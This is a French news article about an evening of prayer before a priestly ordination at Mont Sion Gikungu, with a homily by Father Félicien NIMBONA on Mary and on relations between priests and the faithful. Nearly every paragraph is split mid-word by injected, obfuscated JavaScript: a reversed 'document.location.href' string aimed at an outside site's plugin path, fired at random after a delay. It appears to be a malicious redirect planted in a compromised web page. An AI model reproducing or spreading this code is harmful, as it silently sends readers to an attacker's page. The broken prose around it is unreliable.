Le mercredi 24 avril 2019 a été le troisième jour d’une prière pour l’ordination sacertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotale qui aura lieu le 28avril au Mont Sion Gikungu.
Apres la messe vespérale, les participants se rassemblent dans la Chapelle Eucharistique. Comme pour les jours précédents, ils entonnent les chants d’animation, avant la louange.
Dans son instruction, le Père Félicien NIMBONA a insisté sur la relation qui toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit y avoir entre les Prêtre et les fidèles. En se basant sur la parole de Dieu tirée dans l’Evangile selon Saint Jean au chapitre 19,25-27, il a montré comment Marie est la Reine des Apôtres : « Marie aime les Prêtres d’un amour tendre et profond, elle les appelle d’ailleurs ses fils de prédilection, dit-il. » Le Prêtre toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit de ce fait accueillir chez lui Marie comme l’avait fait saint Jean. « Le Prêtre devient de ce fait un autre Jean, dit le Père Félicien.
Le Prêtre est inquiété par la relation qui existe entre les Prêtres et le peuple : « Je suis franchement étonné qutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and je remarque combien les fidèles ne prient pas pour leurs Prêtres, alors qu’ils savent que ces derniers ne sont pas des anges et combien leur mission n’est pas si facile. »
Il ajoute que c’est très toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dommage à voir comment certains des fidèles s’atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnent à juger leurs prêtres : « c’est très facile de juger vos serviteurs que de s’agenouiller pour prier pour eux. »
Il a parlé aussi de la relation qui est tellement bizarre entre Prêtres et fidèles. « C’est comme si il y a un grtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and mûr qui vous différencient de vos pasteurs. Les Prêtres ne sont pas des monstres ou des animaux à éviter ; ils sont les vôtres, ils sont pour vous, a-t-il insisté. C’est ainsi qu’il a lancé un appel vivant à ces fidèles participants : « Approcher vos Prêtres dans votre prière, tout en les soutenant dans leur apostolat. »
Il a aussi rappelé que le Prêtre est comme un pont reliant Dieu et son peuple : « Vous recevez les bienfaits de Dieu parce qu’il y a un Prêtre. »
Que chaque Prêtre reçoit chez lui la Mère de Dieu, elle priera pour lui et deviendra saint, il sanctifiera à son tour le peule de Dieu.
Brigitte IRAKOZE